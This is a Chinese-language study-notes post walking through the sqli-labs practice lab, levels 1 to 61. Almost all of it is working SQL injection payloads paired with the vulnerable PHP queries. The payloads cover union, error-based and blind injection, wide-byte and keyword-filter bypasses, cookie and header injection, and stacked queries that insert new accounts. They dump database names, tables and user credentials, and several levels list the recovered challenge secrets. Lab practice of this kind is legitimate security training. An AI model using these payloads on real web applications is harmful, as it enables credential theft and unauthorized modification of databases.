sqli-less 筆記

託帕發表於2018-08-03

一   ' 
?id=1'
?id=1' and 1=1%23
?id=1' and 1=2%23

二   數值 
?id=1'
?id=1 and 1=1%23
?id=1 and 1=2%23

三  ')
?id=1'。
?id=1') and 1=1%23
?id=1') and 1=2%23

四   ")
?id=1")
?id=1") and 1=1%23
?id=1") and 1=2%23

五   '   報錯
1' and updatexml(1,concat(0x23,(database())),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

六    "   報錯
1" and updatexml(1,concat(0x23,(database())),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
1" and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23

七   ')) 盲注
1')) and length(database())=8 %23    //求資料庫的長度
1')) and ascii(substr(database(),1,1))=115%23    //求資料庫名的ascii值
1')) and (select count(table_name) from information_schema.tables where table_schema='security')=4%23    //求表的數量
1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23  //求表名的ascii碼值
1')) and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23   //求列的數量  
1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105 %23   //求列名的ascii碼值
1')) and (select count(username) from security.users)=13 %23  //求欄位的內容
1')) and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23   //求欄位的ascii碼值

八     '  盲注
(參考七)

九     ' 時間型盲注
?id=1' and if(length(database())>10,sleep(0),sleep(5))%23

十     " 時間型盲注
(參考九)

十一    '報錯
@$sql="SELECT username,password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
username輸入:admin
password輸入:admin' and updatexml(1,concat(0x23,(database())),0)#
admin' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
admin' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)#

十二  ")報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
username輸入:admin
password輸入:1") and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)

十三   ')報錯
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
username輸入:admin
password輸入:admin') and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)

十四  "報錯
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
username輸入:admin
password輸入:admin" and updatexml(1,concat(0x7e,(database())),0)#
(參考十一)


十五   '(布林型、時間)盲注
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1;
username輸入:admin
password輸入:admin' and sleep(if(length(database())>10,0,5))#

十六   "(布林型、時間)盲注
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1;
username輸入:admin
password輸入:admin") and sleep(if(length(database())>10,0,5))#

十七   報錯
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
username   admin
password   admin' or updatexml(1,concat(0x7e,(database())),0) or '1

十八   User-Agent報錯  burp攔截
username   admin
password   admin
$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
uagent後加    1' or updatexml(1,concat(0x7e,(database())),0) or '

十九      referer報錯  burp攔截
$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
referer後加   1' or updatexml(1,concat(0x7e,(database())),0) or '

二十    '  burp攔截   聯合查詢
第一步:用某一個賬號aaa登入成功
第二步:重新整理頁面,用burp攔截,修改cookie欄位 
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
在uname=aaa後輸入    ' order by 3%23
在uname=aaa後輸入    ' and 1=2 union select 1,2,3%23
在uname=aaa後輸入    ' and 1=2 union select 1,database(),3%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
在uname=aaa後輸入    ' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

二十一    ')  burp攔截   聯合查詢
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
與二十題基本相似,不同的是,閉合條件為單引號加括號,cookie中uname編碼為base64
uname=aaa') order by 3#   ->    uname=YWEnKSBvcmRlciBieSAzIw==
uname=aaa') and 1=2 union select 1,2,3#   ->    uname=YWFhJykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
uname=') and 1=2 union select 1,2,database()#   ->    uname=JykgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
(參考二十)

二十二   "   burp攔截   聯合查詢
$cookee = $_C
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
與二十一題基本相似,不同的是,閉合條件為雙引號
(參考二十一)


二十三  '  聯合查詢
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,2,'3
1' and 1=2 union select 1,database(),'3
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users where '1'='1


二十四
使用者註冊login_create.php
$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";、
username輸入:admin'#
password隨意

使用者登入login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

密碼修改pass_change.php
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
二次排序注入

二十五     聯合查詢  
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        
    $id= preg_replace('/AND/i',"", $id);
    
    return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' anandd 1=2 union select 1,2,'3
1' anandd 1=2 union select 1,database(),'3
1' anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security
1' anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users
1' anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users where '1'='1

二十五a   聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);        
    $id= preg_replace('/AND/i',"", $id);        
    
    return $id;
}
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=1 oorr updatexml(1,concat(0x23,database()),1) %23 LIMIT 0,1";

1 oorrder by 3%23
1 anandd 1=2 union select 1,2,3%23
1 anandd 1=2 union select 1,database(),3%23
1 anandd 1=2 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'%23
1 anandd 1=2 union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'%23
1 anandd 1=2 union select 1,group_concat(username,0x23,passwoorrd),3 from security.users%23

二十六   聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),'3
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name='users
1'%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,group_concat(username,0x23,passwoorrd)%0Bfrom%0Bsecurity.users%0Bwhere%0B'1'='1

二十六a聯合查詢
$id=$_GET['id'];
$id= blacklist($id);
function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,2,('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,database(),('3
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(table_name),3%0Bfrom%0B infoorrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(column_name),3%0Bfrom%0B infoorrmation_schema.columns%0Bwhere%0Btable_schema='security'%0banandd %0btable_name=('users
1')%0Banandd%0B1=2%0Bunion%0Bselect%0B1,group_concat(username,0x23,passwoorrd),3%0bfrom%0bsecurity.users%0bwhere%0b('1'='1

二十七
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out select
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),'3
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema='security
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name='users
1'%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B'1'='1

二十七a
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2, "3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),"3
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema="security
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name="users
1"%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,passwOrd),3%0Bfrom%0B security.users%0Bwhere%0B"1"="1


二十八
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
$id= preg_replace('/[--]/',"", $id);                //Strip out --.
$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
return $id;
}
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band %0btable_name=('users
1')%0BaNd%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,passwOrd),3%0Bfrom%0Bsecurity.users%0Bwhere%0B('1'='1

二十八a
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
//$id= preg_replace('/[--]/',"", $id);                //Strip out --.
//$id= preg_replace('/[#]/',"", $id);                    //Strip out #.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
//$id= preg_replace('/select/m',"", $id);                    //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);        //Strip out spaces.
return $id;
}
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,2,('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,database(),('3
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(table_name),3%0Bfrom%0B infOrmation_schema.tables%0Bwhere%0B table_schema=('security
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(column_name),3%0Bfrom%0B infOrmation_schema.columns%0Bwhere%0Btable_schema='security'%0band%0btable_name=('users
1')%0Band%0B1=2%0BuNion%0BselEct%0B1,group_concat(username,0x23,password),3%0Bfrom%0B security.users%0Bwhere%0B('1'='1

二十九   
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23


三十   
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1" order by 3%23
1" and 1=2 union select 1,2,3%23
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1" and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十一
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";
1") order by 3%23
1") and 1=2 union select 1,2,3%23
1") and 1=2 union select 1,database(),3%23
1") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1") and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十二  寬位元組注入
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);             
$string = preg_replace('/\'/i', '\\\'', $string);                                  
$string = preg_replace('/\"/', "\\\"", $string);                                  
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十三
$id=check_addslashes($_GET['id']);
function check_addslashes($string)
{
    $string= addslashes($string);    
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' order by 3%23
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十四   聯合 burp攔截
$uname1=$_POST['uname'];
$passwd1=$_POST['passwd'];
$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
0x61646d696e(admin)   
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23


三十五
$string = addslashes($string);
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十六 MYSQL檔案裡面的my.ini裡面的gbk改為Latin1 
$id=check_quotes($_GET['id']);
function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1%df' and 1=2 union select 1,2,3%23
1%df' and 1=2 union select 1,database(),3%23
1%df' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23

三十七  burp攔截
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
1%df' and 1=2 union select 1,2%23
1%df' and 1=2 union select 1,database()%23
1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479%23
1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273%23
1%df' and 1=2 union select 1,group_concat(username,0x23,password) from security.users%23

三十八 ' 基於聯合查詢的堆疊注入
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
1' order by 3%23
1' and 1=2 union select 1,2,3%23
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1'and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1' and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
1';insert into users(username,password) values('less38','less38')%23


三十九  數值
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十  ')
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
1') order by 3%23
1') and 1=2 union select 1,2,3%23
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1') and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十一
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
1 order by 3%23
1 and 1=2 union select 1,2,3%23
1 and 1=2 union select 1,database(),3%23
1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十二  堆疊注入 報錯
Login
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
賬號隨意
密碼   a';create table W like users# //新增表
密碼   a';insert into users values(20,'xj','xj123')#  //新增賬號密碼
登入進去修改密碼

四十三
Login  
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上

四十四
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上

四十五
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上

四十六 報錯
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,顯示結果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 顯示不完全

四十七
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 顯示不完全

四十八 錯誤不回顯 時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

四十九 錯誤不回顯 時間盲注
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十 時間盲注 堆疊注入(參考上面)
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23


五十一 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十二 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

五十三 時間盲注
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十四
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY 

五十五
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn

五十六
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6

五十七
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs

五十八
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO

五十九
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7
')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg

六十
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2

六十一
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x
')),1)%23
//id,sessid,secret_NSKU,tryy
